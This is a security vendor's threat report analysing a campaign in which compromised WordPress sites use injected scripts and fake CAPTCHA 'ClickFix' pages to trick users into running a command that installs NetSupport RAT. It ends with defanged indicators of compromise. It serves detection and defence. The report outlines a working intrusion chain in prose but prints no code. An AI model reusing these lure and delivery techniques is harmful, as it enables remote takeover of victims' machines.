Cybereason Security Services Team
In May 2025, Cybereason Global Security Operations Center (GSOC) detected that threat actors have been hosting malicious WordPress websites to deliver malicious versions of the legitimate NetSupport Manager Remote Access Tool (RAT).
This report analyzes the methods and tools used by threat actors to deploy the NetSupport RAT payload, focusing on the malicious JavaScript and associated techniques. It also includes relevant Indicators of Compromise (IOCs).
Threat actors utilize phishing campaigns to distribute a malicious website link through:
Website Compromise: Malicious script injects iframe on compromised site on victims’ access.
DOM Manipulation: The threat actor manipulates the Document Object Model (DOM) to display a fake CAPTCHA page.
Payload Delivery: Users, following the fake CAPTCHA instructions, download the NetSupport RAT.
Post-Infection: The threat actor connects to the NetSupport Client process and performs reconnaissance using the NetSupport Remote Command Prompt.
Stage 1: iFrame Injection(j.js)
Through one of the identified delivery methods, an end user is redirected to a malicious website. Below is a screenshot of one such site that a user would encounter.
Threat actors embed malicious JavaScript into the meta description of the website’s index page. When a user's browser loads the page, it processes the meta tag and triggers the download and execution of a remote script (j.js) from the domain (islonline[.]org).
Threat actors additionally embed malicious JavaScript within the anchor tag of the "Home Page" link. As a result, when users click what seems to be a normal "Home Page" link, the browser tries to navigate to the home page while simultaneously loading and executing the malicious script (j.js).
The malicious website operated by the threat actor loads the following JavaScript files.
There are two versions of the malicious file j.js in the first stage of the attack. When the threat actor is offline, an empty file (j.js) script is loaded.
When the threat actor is active, a modified version of the JavaScript file (j.js) is deployed. This script specifically targets users on the Windows operating system and performs the following actions:
The malicious script (j.js) stores a data item called “lastvisit” in the browser’s local storage to track whether the user has previously visited the webpage. If the user has previously visited the site, the script refrains from generating the iframe, allowing the attacker to mask their presence.
Stage 2: DOM Script Injection (index.php)
The malicious file (index.php)dynamically generates a script element to inject JavaScript using the document.createElement() method.
In the below code block, the src attribute points to another malicious website that hosts the script (select.js). The iframe will load (select.js) script from the malicious URL.
The (select.js) file contains a script to load a fake CAPTCHA page.
Stage 3: Fake CAPTCHA Page (Select.js) (ClickFix Technique)
The (select.js) script performs several DOM manipulations, such as injecting a Tailwind CSS stylesheet to style the CAPTCHA interface, removing existing stylesheets to override the website's original design, and rendering a React-based CAPTCHA challenge.
While appearing as a human verification step, the page employs navigator.clipboard.writeText(nE.command) to copy a malicious command to the user's clipboard. It then displays instructions, prompting the user to paste and execute it via the Windows Run dialog box (Win + R).
While multiple variations of the command were observed, each one ultimately downloads and executes a batch file containing the NetSupport Client files.
Stage 4: Curl.exe (jfgf.bat)
Once run, the batch file does the following on the endpoint:
When opened in a text editor, the batch file includes large comment blocks filled with junk data between the commands. This is likely an obfuscation technique designed to evade inspection.
The deobfuscated version of the batch file is shown below.
The ZIP archive contains a fully staged deployment of NetSupport Client, accompanied by several supporting components. Upon extraction, the following files are present:
|
Filename |
Description |
|
client32.exe |
NetSupport Client Application |
|
client32.ini |
NetSupport Client Configuration File |
|
HTCTL32.DLL |
NetSupport HTTP Transport |
|
Mss32.dll |
Miles Sound System |
|
msvcp120.dll |
Microsoft C Runtime Library |
|
msvcr100.dll |
Microsoft C Runtime Library |
|
nskbfltr.inf |
NS Keyboard Filter |
|
NSM.ini |
NetSupport Component File |
|
NSM.LIC |
NetSupport Licence File |
|
pcicapi.dll |
NetSupport pcicapi |
|
PCICHEK.DLL |
NetSupport pcichek |
|
PCICL32.DLL |
NetSupport Client DLL |
|
pnf1.dll |
iTop VPN |
|
remcmdstub.exe |
NetSupport Remote Command Prompt |
|
TCCTL32.DLL |
NetSupport TCP Transport |
After launching, the NetSupport Client Application (client32.exe) establishes an outbound connection to the Connectivity Server specified in the client configuration file and then remains idle on the infected machine until the threat actor connects to it through the NetSupport Control.
The entire attack chain is illustrated below.
NetSupport Manager is a legitimate remote access tool developed for remote systems management, enabling IT teams to provide technical support, manage devices across multiple sites, and perform tasks such as file transfers, support chat, and inventory management. However, its complete feature set has made it an attractive target for threat actors, who have repurposed it to gain unauthorized access to systems, deploy additional malware, and conduct further attacks.
According to a recent report, NetSupport Manager was the seventh most prevalent threat in 2024. The tool is frequently referred to as a malicious Remote Access Trojan rather than a benign Remote Access Tool due to its widespread exploitation.
The NetSupport Client Configuration file (client32.ini) is central to NetSupport’s functionality, as it defines how the Client connects to the Control system. This config file contains a GatewayAddress setting that specifies the IP address of the NetSupport Connectivity Server (Gateway). The NetSupport Connectivity Server is a component of NetSupport Manager that provides a method for connecting Clients and Controls over the internet using HTTP.
All NetSupport Connectivity Servers identified in the recent intrusion we investigated are located within the (94.158.245[.]0/24) network block, which is registered to MivoCloud SRL, a hosting provider operating data centers in Moldova. Shodan scans revealed that these IP addresses are associated with Windows Server operating systems and have exposed TCP/3389 (RDP) and TCP/443 (HTTPS) ports.
The full feature set offered by NetSupport Manager, including file transfer, remote command execution, and application launching, makes it an effective tool for conducting post-exploitation activities.
Within hours of initial compromise, threat actors have been observed connecting to the compromised endpoint, transferring files to the directory (C:\Users\Public\), and launching the NetSupport Remote Command Prompt (remcmdstub.exe) to execute reconnaissance commands, such as querying Active Directory for all computer accounts that are members of the "Domain Computers" group.
|
IOC |
IOC Type |
|
94.158.245[.]104 |
IP |
|
94.158.245[.]118 |
IP |
|
94.158.245[.]131 |
IP |
|
94.158.245[.]137 |
IP |
|
pemptousia[.]com |
DOMAIN |
|
172.67.70[.]20 |
IP |
|
fmovies123[.]top |
DOMAIN |
|
79.141.173[.]158 |
IP |
|
badgervolleyball[.]org |
DOMAIN |
|
209.17.116[.]165 |
IP |
|
islonline[.]org |
DOMAIN |
|
23.23.49[.]179 |
IP |
|
lang3666[.]top |
DOMAIN |
|
193.111.208[.]110 |
IP |
|
ace-project[.]org |
DOMAIN |
|
162.214.153[.]12 |
IP |
|
jakestrack[.]com |
DOMAIN |
|
50.87.146[.]66 |
IP |
|
christianlouboutin2017[.]top |
DOMAIN |
|
77.83.199[.]34 |
IP |
|
jaagnet[.]com |
DOMAIN |
|
107.180.0[.]222 |
IP |
|
83.229.17[.]68 |
IP |
|
9c4349534c137e3e43fb2e2caf049f9d |
MD5 |
|
4f496bfde39ca83644265d8d1d9bc9da |
MD5 |
|
c05f8ec5afbabc36f1c1366549290ae6 |
MD5 |
|
20ed4df3a9c734c1788bd2ca2658aedb |
MD5 |
|
ee75b57b9300aab96530503bfae8a2f2 |
MD5 |
|
1768c9971cea4cc10c7dd45a5f8f022a |
MD5 |
Once an affected endpoint is identified, immediate containment is critical, as threat actors have been observed operating within hours of initial compromise. The following actions are recommended to mitigate further risk:
Cristian Carrillo Mendez, T1 GSOC Analyst
Cristian is a GSOC Analyst with the Cybereason Global SOC team, where he specializes in MalOp Investigations and has a strong interest in Threat Hunting. He holds several industry-recognized certifications, including GIAC GSEC, GCIH, and GPEN.
Hema Loganathan, T2 GSOC Analyst
Hema Loganathan is a GSOC Analyst with the Cybereason Global SOC team. She is involved in MalOp Investigation, Malware Analysis, Reverse Engineering and Threat Hunting. Hema has a Master of Science degree in Information Systems.
Cybereason issues Threat Alerts to inform customers of emerging impacting threats, including critical vulnerabilities such as the Ivanti Connect Secure VPN Zero-Day exploitation. Cybereason Threat Alerts summarize these threats and provide practical recommendations for protecting against them.
Cybereason issues Threat Alerts to inform customers of emerging impacting threats, including new ransomware actors such as the emergent group INC Ransom. Cybereason Threat Alerts summarize these threats and provide practical recommendations for protecting against them.
Cybereason issues Threat Alerts to inform customers of emerging impacting threats, including critical vulnerabilities such as the Ivanti Connect Secure VPN Zero-Day exploitation. Cybereason Threat Alerts summarize these threats and provide practical recommendations for protecting against them.
Cybereason issues Threat Alerts to inform customers of emerging impacting threats, including new ransomware actors such as the emergent group INC Ransom. Cybereason Threat Alerts summarize these threats and provide practical recommendations for protecting against them.
Get the latest research, expert insights, and security industry news.
Subscribe
